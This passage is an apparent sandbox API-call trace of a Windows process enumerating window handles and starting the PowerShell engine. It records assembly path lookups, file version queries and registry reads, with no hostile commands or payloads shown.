	[0257.535] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x150
	[0257.535] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x720
	[0257.535] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x3c4
	[0257.535] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x7d4
	[0257.535] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x6c8
	[0257.535] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xb54
	[0257.535] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xb54
	[0257.536] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xb5c
	[0257.536] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x838
	[0257.536] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x818
	[0257.536] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x5b8
	[0257.536] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x494
	[0257.536] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x1ec
	[0257.537] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x440
	[0257.537] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x7e8
	[0257.537] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x730
	[0257.537] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x2c8
	[0257.537] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x31c
	[0257.537] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x330
	[0257.537] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x128
	[0257.537] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x5c8
	[0257.538] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x6f8
	[0257.538] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x358
	[0257.538] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x73c
	[0257.538] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0xb0
	[0257.538] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x250
	[0257.538] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x240
	[0257.538] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x790
	[0257.538] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x61c
	[0257.538] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x568
	[0257.539] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x538
	[0257.539] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x540
	[0257.539] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x510
	[0257.539] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x460
	[0257.539] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x79c
	[0257.539] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x4e0
	[0257.539] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x460
	[0257.539] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x12dbe0 | out: lpdwProcessId=0x12dbe0) returned 0x778
	[0257.543] WerSetFlags () returned 0x0
	[0257.551] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0257.551] CoTaskMemFree (pv=0x0) 
	[0257.552] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12df48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12df40 | out: pulNumLanguages=0x12df48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12df40) returned 1
	[0257.552] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12df48, pwszLanguagesBuffer=0x2c7fbd0, pcchLanguagesBuffer=0x12df40 | out: pulNumLanguages=0x12df48, pwszLanguagesBuffer=0x2c7fbd0, pcchLanguagesBuffer=0x12df40) returned 1
	[0257.557] CoTaskMemAlloc (cb=0x24) returned 0x366e70
	[0257.557] GetUserDefaultLocaleName (in: lpLocaleName=0x366e70, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0257.558] CoTaskMemFree (pv=0x366e70) 
	[0258.129] CoTaskMemAlloc (cb=0x104) returned 0x365c20
	[0258.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x365c20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.129] CoTaskMemFree (pv=0x365c20) 
	[0258.131] CoTaskMemAlloc (cb=0x104) returned 0x365c20
	[0258.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x365c20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.131] CoTaskMemFree (pv=0x365c20) 
	[0258.133] CoTaskMemAlloc (cb=0x104) returned 0x365c20
	[0258.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x365c20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.133] CoTaskMemFree (pv=0x365c20) 
	[0258.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.144] SetErrorMode (uMode=0x1) returned 0x1
	[0258.144] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12dbc0 | out: lpFileInformation=0x12dbc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0258.144] SetErrorMode (uMode=0x1) returned 0x1
	[0258.144] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12de30 | out: lpdwHandle=0x12de30) returned 0x94c
	[0258.145] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c83460 | out: lpData=0x2c83460) returned 1
	[0258.146] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dda8, puLen=0x12dda0 | out: lplpBuffer=0x12dda8*=0x2c834fc, puLen=0x12dda0) returned 1
	[0258.146] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x2c835d8, puLen=0x12dd10) returned 1
	[0258.146] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0258.146] CoTaskMemAlloc (cb=0x2e) returned 0x373a40
	[0258.146] lstrcpyW (in: lpString1=0x373a40, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0258.146] CoTaskMemFree (pv=0x373a40) 
	[0258.146] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x2c8362c, puLen=0x12dd10) returned 1
	[0258.146] lstrlenW (lpString="System.Management.Automation") returned 28
	[0258.146] CoTaskMemAlloc (cb=0x3c) returned 0x374820
	[0258.147] lstrcpyW (in: lpString1=0x374820, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0258.147] CoTaskMemFree (pv=0x374820) 
	[0258.147] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x2c83688, puLen=0x12dd10) returned 1
	[0258.147] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0258.147] CoTaskMemAlloc (cb=0x20) returned 0x36dae0
	[0258.147] lstrcpyW (in: lpString1=0x36dae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0258.147] CoTaskMemFree (pv=0x36dae0) 
	[0258.147] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x2c836c8, puLen=0x12dd10) returned 1
	[0258.147] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0258.147] CoTaskMemAlloc (cb=0x44) returned 0x374820
	[0258.147] lstrcpyW (in: lpString1=0x374820, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0258.147] CoTaskMemFree (pv=0x374820) 
	[0258.147] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x2c83730, puLen=0x12dd10) returned 1
	[0258.147] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0258.147] CoTaskMemAlloc (cb=0x76) returned 0x3191b0
	[0258.147] lstrcpyW (in: lpString1=0x3191b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0258.147] CoTaskMemFree (pv=0x3191b0) 
	[0258.147] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x2c837cc, puLen=0x12dd10) returned 1
	[0258.147] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0258.148] CoTaskMemAlloc (cb=0x44) returned 0x374820
	[0258.148] lstrcpyW (in: lpString1=0x374820, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0258.148] CoTaskMemFree (pv=0x374820) 
	[0258.148] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x2c83830, puLen=0x12dd10) returned 1
	[0258.148] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0258.148] CoTaskMemAlloc (cb=0x58) returned 0x2ce2e0
	[0258.148] lstrcpyW (in: lpString1=0x2ce2e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0258.148] CoTaskMemFree (pv=0x2ce2e0) 
	[0258.148] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x2c838ac, puLen=0x12dd10) returned 1
	[0258.148] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0258.148] CoTaskMemAlloc (cb=0x20) returned 0x36dae0
	[0258.148] lstrcpyW (in: lpString1=0x36dae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0258.148] CoTaskMemFree (pv=0x36dae0) 
	[0258.148] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x2c83554, puLen=0x12dd10) returned 1
	[0258.148] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0258.148] CoTaskMemAlloc (cb=0x66) returned 0x36c0c0
	[0258.148] lstrcpyW (in: lpString1=0x36c0c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0258.148] CoTaskMemFree (pv=0x36c0c0) 
	[0258.148] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x0, puLen=0x12dd10) returned 0
	[0258.148] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x0, puLen=0x12dd10) returned 0
	[0258.149] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dd18, puLen=0x12dd10 | out: lplpBuffer=0x12dd18*=0x0, puLen=0x12dd10) returned 0
	[0258.149] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dce8, puLen=0x12dce0 | out: lplpBuffer=0x12dce8*=0x2c834fc, puLen=0x12dce0) returned 1
	[0258.149] CoTaskMemAlloc (cb=0x204) returned 0x314ad0
	[0258.149] VerLanguageNameW (in: wLang=0x0, szLang=0x314ad0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0258.149] CoTaskMemFree (pv=0x314ad0) 
	[0258.149] VerQueryValueW (in: pBlock=0x2c83460, lpSubBlock="\\", lplpBuffer=0x12dd38, puLen=0x12dd30 | out: lplpBuffer=0x12dd38*=0x2c83488, puLen=0x12dd30) returned 1
	[0258.578] CoTaskMemAlloc (cb=0x104) returned 0x365c20
	[0258.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x365c20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.578] CoTaskMemFree (pv=0x365c20) 
	[0258.579] CoTaskMemAlloc (cb=0x104) returned 0x365c20
	[0258.579] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x365c20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.579] CoTaskMemFree (pv=0x365c20) 
	[0258.579] lstrlenW (lpString="䅁") returned 1
	[0258.586] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dc08 | out: phkResult=0x12dc08*=0x304) returned 0x0
	[0258.587] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dbf8 | out: phkResult=0x12dbf8*=0x308) returned 0x0
	[0258.587] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dc88 | out: phkResult=0x12dc88*=0x30c) returned 0x0
	[0258.590] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dbcc, lpData=0x0, lpcbData=0x12dbc8*=0x0 | out: lpType=0x12dbcc*=0x1, lpData=0x0, lpcbData=0x12dbc8*=0x56) returned 0x0
	[0258.591] CoTaskMemAlloc (cb=0x5a) returned 0x36c050
	[0258.591] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12db9c, lpData=0x36c050, lpcbData=0x12db98*=0x56 | out: lpType=0x12db9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12db98*=0x56) returned 0x0
	[0258.591] CoTaskMemFree (pv=0x36c050) 
	[0258.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.616] CoTaskMemAlloc (cb=0x104) returned 0x365c20
	[0258.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x365c20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.616] CoTaskMemFree (pv=0x365c20) 
	[0260.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0260.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0260.612] CoTaskMemAlloc (cb=0x104) returned 0x37df50
	[0260.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x37df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.612] CoTaskMemFree (pv=0x37df50) 
	[0260.613] CoTaskMemAlloc (cb=0x104) returned 0x37df50
	[0260.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x37df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.614] CoTaskMemFree (pv=0x37df50) 
	[0260.939] CoTaskMemAlloc (cb=0x104) returned 0x37df50
	[0260.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x37df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.939] CoTaskMemFree (pv=0x37df50) 
	[0260.940] CoTaskMemAlloc (cb=0x104) returned 0x37df50
	[0260.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x37df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.940] CoTaskMemFree (pv=0x37df50) 
	[0260.940] CoTaskMemAlloc (cb=0x104) returned 0x37df50
	[0260.940] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x37df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.940] CoTaskMemFree (pv=0x37df50) 
	[0261.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0261.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0261.841] CoTaskMemAlloc (cb=0x104) returned 0x389350
	[0261.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.841] CoTaskMemFree (pv=0x389350) 
	[0261.842] CoTaskMemAlloc (cb=0x104) returned 0x389350
	[0261.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.842] CoTaskMemFree (pv=0x389350) 
	[0262.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0262.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0266.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0267.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0267.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0268.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
